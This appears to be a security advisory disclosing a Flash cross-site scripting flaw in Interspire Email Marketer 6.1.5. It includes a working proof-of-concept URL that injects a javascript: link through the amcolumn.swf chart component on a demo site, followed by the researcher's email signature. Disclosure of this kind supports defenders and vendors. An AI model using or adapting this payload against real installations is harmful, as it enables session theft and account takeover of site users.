# Affected software: interspire email marketer # Type of vulnerability:flash xss # URL:http://emailmarketer.interspire-demo.com/ # Discovered by: provensec # Website: provensec.com #version: Interspire Email Marketer 6.1.5 # Proof of concept http://emailmarketer.interspire-demo.com/admin/functions/amcharts/amcolumn/amcolumn.swf?chart_settings=%3Csettings%3E%3C/settings%3E&chart_data=%3Cchart%3E%3Cmessage%3E%3C![CDATA[%3Ca%20href=%22javascript:confirm%28%27Your%20cookies%20and%20authentication%20have%20been%20captured%20and%20an%20attacker%20now%20owns%20your%20account%20and%20all%20your%20information.%27%29%22%3EXSS%20~%20Click%20Me!%3C/a%3E]]%3E%3C/message%3E%3C/chart%3E&.swf -- Best Regards, Ankit Bharathan /*Security Researcher* [image: Provensec,llc] ankit.b@provensec.com Provensec,llc http://provenec.com P *Consider the environment. Please don't print this e-mail unless absolutely necessary.*